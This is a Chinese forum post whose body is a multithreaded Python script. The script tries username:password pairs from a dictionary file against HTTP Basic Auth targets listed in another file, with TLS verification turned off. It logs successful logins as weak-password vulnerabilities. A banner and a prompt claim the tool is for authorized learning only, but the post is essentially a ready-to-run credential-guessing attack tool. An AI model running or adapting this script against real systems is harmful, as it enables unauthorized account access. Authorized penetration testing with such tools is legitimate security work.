TA的每日心情 | 慵懒 3 小时前 |
---|
签到天数: 94 天 [LV.6]常住居民II
|
本帖最后由 微尘 于 2025-9-21 20:46 编辑
import requests
import threading
from queue import Queue
import time
from datetime import datetime
import re
# ----------------- Configuration (adjust to the authorized test scope) -----------------
TARGET_FILE = "目标.txt"      # text file read line by line; each line is a target URL
DICT_FILE = "账户密码.txt"    # text file read line by line; "username:password" entries
THREAD_NUM = 5                # number of worker threads started by main()
TIMEOUT = 10                  # passed as ``timeout=`` to requests.get
# ---------------------------------------------------------------------------------------

# Work queues shared by all worker threads.
target_queue, dict_queue = Queue(), Queue()

# Guards console output, the log file and the counters below.
print_lock = threading.Lock()

# Per-status result counters, keyed by the ``status`` field of a result dict.
stats = dict.fromkeys(("vuln", "safe", "error", "no_match"), 0)
def validate_url(url):
    """Return True if ``url`` looks like an HTTP(S) URL or a bare host name.

    The ``http://`` / ``https://`` scheme is optional. The host must consist
    of one or more dot-terminated labels followed by an alphabetic final
    label of at least two letters, optionally followed by ``:port`` (1-5
    digits) and a path starting with ``/``.

    NOTE(review): because the final label must be alphabetic, IPv4 literals
    (``http://192.168.1.1``) and single-label hosts (``localhost``) are
    rejected -- confirm that this is intended.

    Args:
        url: The string to check.

    Returns:
        bool: True when the pattern matches, False otherwise.
    """
    pattern = re.compile(r'^(https?://)?([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}(:\d{1,5})?(/.*)?$')
    return re.match(pattern, url) is not None
def load_items(file_path, queue, split_func=None):
    """Read the non-blank lines of ``file_path`` and put them on ``queue``.

    Args:
        file_path: Path of a UTF-8 text file holding one item per line.
        queue: Object providing ``put`` and ``qsize`` (e.g. ``queue.Queue``).
        split_func: Optional callable applied once to each stripped line. Its
            return value is queued in place of the line; lines for which it
            returns a falsy value are dropped.

    Raises:
        FileNotFoundError: Re-raised, after printing a message, when the file
            does not exist.
    """
    try:
        # "utf-8-sig" decodes plain UTF-8 and additionally drops a leading
        # byte-order mark, which would otherwise stay attached to the first
        # item (str.strip() does not remove U+FEFF).
        with open(file_path, 'r', encoding='utf-8-sig') as f:
            items = [text for text in (line.strip() for line in f) if text]
    except FileNotFoundError:
        print(f'[-] 文件 {file_path} 不存在')
        raise

    if split_func:
        # Call split_func exactly once per line, then filter on its result.
        converted = (split_func(item) for item in items)
        items = [entry for entry in converted if entry]

    for item in items:
        queue.put(item)
    print(f'[+] 加载 {queue.qsize()} 个项目')
def verify_auth(target, username, password):
    """Send one HTTP Basic Auth GET request to ``target`` and classify it.

    Args:
        target: URL handed to ``requests.get``.
        username: Account name (str); sent UTF-8 encoded.
        password: Password (str); sent UTF-8 encoded.

    Returns:
        dict: Keys ``target``, ``username``, ``password``, ``status``,
        ``message`` and ``time`` (local time, ``%Y-%m-%d %H:%M:%S``).
        ``status`` is ``"vuln"`` for HTTP 200, ``"safe"`` for HTTP 401,
        ``"error"`` when the request raised, and stays ``"unknown"`` for any
        other status code. No exception propagates to the caller.
    """
    result = {
        "target": target, "username": username, "password": password,
        "status": "unknown", "message": "", "time": datetime.now().strftime("%Y-%m-%d %H:%M:%S")
    }
    try:
        # Credentials are passed as bytes so that they go out UTF-8 encoded.
        auth = (username.encode('utf-8'), password.encode('utf-8'))
        # NOTE: verify=False turns off TLS certificate verification.
        resp = requests.get(target, auth=auth, timeout=TIMEOUT, verify=False)
        if resp.status_code == 200:
            result["status"] = "vuln"
            result["message"] = "弱口令漏洞存在"
        elif resp.status_code == 401:
            result["status"] = "safe"
            result["message"] = "账号密码不匹配"
        else:
            result["message"] = f'未知状态码 {resp.status_code}'
    except requests.exceptions.Timeout:
        # Timeout is the common base of ConnectTimeout and ReadTimeout, so a
        # slow response is reported as a timeout instead of an unknown error.
        # It must precede ConnectionError, which ConnectTimeout also inherits.
        result["status"] = "error"
        result["message"] = "目标连接超时"
    except requests.exceptions.ConnectionError:
        result["status"] = "error"
        result["message"] = "目标连接失败"
    except Exception as e:
        # Last-resort boundary: one bad target must not kill a worker thread.
        result["status"] = "error"
        result["message"] = f'未知错误 {str(e)[:30]}...'
    return result
# One log file per run: the name is fixed once instead of being rebuilt for
# every record, so a run that crosses a second boundary stays in one file.
_RUN_LOG_FILE = f'dict_brute_log_{datetime.now().strftime("%Y%m%d%H%M%S")}.txt'


def _format_status_line(res):
    """Return the console line describing one result dict from verify_auth."""
    base = f'{res["target"]} | 账号:{res["username"]} | 密码:{res["password"]}'
    status = res["status"]
    if status == "vuln":
        return f'[!] 【漏洞存在】 {base}'
    if status == "safe":
        return f'[+] 【无漏洞】 {base}'
    if status == "error":
        return f'[-] 【验证失败】 {base} | {res["message"]}'
    if status == "no_match":
        return f'[-] 【无匹配】 {base} | 字典无匹配密码'
    # verify_auth leaves status at "unknown" for unexpected HTTP codes; report
    # it instead of failing on a missing dictionary key.
    return f'[?] 【结果未知】 {base} | {res["message"]}'


def _record_result(res):
    """Append one result to the run log, print it and update the counters."""
    log_line = f"{res['time']}\t{res['status']}\t{res['target']}\t{res['username']}\t{res['password']}\t{res['message']}\n"
    with print_lock:
        with open(_RUN_LOG_FILE, 'a', encoding='utf-8') as f:
            f.write(log_line)
        print(_format_status_line(res))
        # .get() tolerates statuses that have no pre-seeded counter.
        stats[res["status"]] = stats.get(res["status"], 0) + 1
        # Items are consumed in pairs, so the shorter queue bounds what is left.
        remaining = min(target_queue.qsize(), dict_queue.qsize())
        print(f' 剩余任务:{remaining} | 已发现漏洞:{stats["vuln"]}')


def worker():
    """Consume (target, credential) pairs until either queue runs dry.

    Each iteration takes one item from ``target_queue`` and one
    ``(username, password)`` entry from ``dict_queue``, so the two queues are
    consumed in lockstep and at most ``min(targets, credentials)`` checks run.
    NOTE(review): confirm that this one-to-one pairing is the intended design.

    Items are fetched without blocking, so a thread can never wait forever on
    a queue that another thread has just emptied, and ``task_done`` is called
    for every item that was dequeued, even if processing raises.
    """
    from queue import Empty

    while True:
        try:
            target = target_queue.get_nowait()
        except Empty:
            return
        try:
            try:
                credential = dict_queue.get_nowait()
            except Empty:
                # No credential left to pair with this target: stop here; the
                # enclosing ``finally`` still marks the target as done.
                return
            try:
                username, password = credential
                _record_result(verify_auth(target, username, password))
            finally:
                dict_queue.task_done()
        finally:
            target_queue.task_done()


def main():
    """Interactive entry point: confirm authorization, load inputs, run workers.

    Returns early without doing any work when the user does not answer "y",
    when an input file is missing, or when either input list is empty.
    """
    print("=" * 60 + "\n 警告:本工具仅用于授权环境下的学习,禁止未授权使用!\n" + "=" * 60)
    if input("\n是否已获得授权并确认用于学习?(y/n):").strip().lower() != "y":
        return
    print(f' 工具启动于 {datetime.now().strftime("%Y-%m-%d %H:%M:%S")}')
    try:
        load_items(TARGET_FILE, target_queue)
        load_items(DICT_FILE, dict_queue, lambda x: tuple(x.split(':', 1)) if ':' in x else None)
    except FileNotFoundError:
        return
    if target_queue.empty() or dict_queue.empty():
        print('[-] 目标或字典为空,无任务可执行')
        return
    start = time.time()
    threads = [threading.Thread(target=worker, daemon=True) for _ in range(THREAD_NUM)]
    for thread in threads:
        thread.start()
    # Wait for the threads rather than for the queues: when the two input
    # files differ in length the longer queue is never fully drained, so
    # Queue.join() on it would block forever.
    for thread in threads:
        thread.join()
    print(f'\n 任务完成 | 耗时 {round(time.time() - start, 2)}s')
    print(
        f' 统计:漏洞 {stats["vuln"]} 个 | 无漏洞 {stats["safe"]} 个 | 失败 {stats["error"]} 个 | 字典无匹配 {stats["no_match"]} 个'
        f' | 未知 {stats.get("unknown", 0)} 个'
    )
# Run the tool only when this file is executed as a script, not on import.
if __name__ == "__main__":
    main()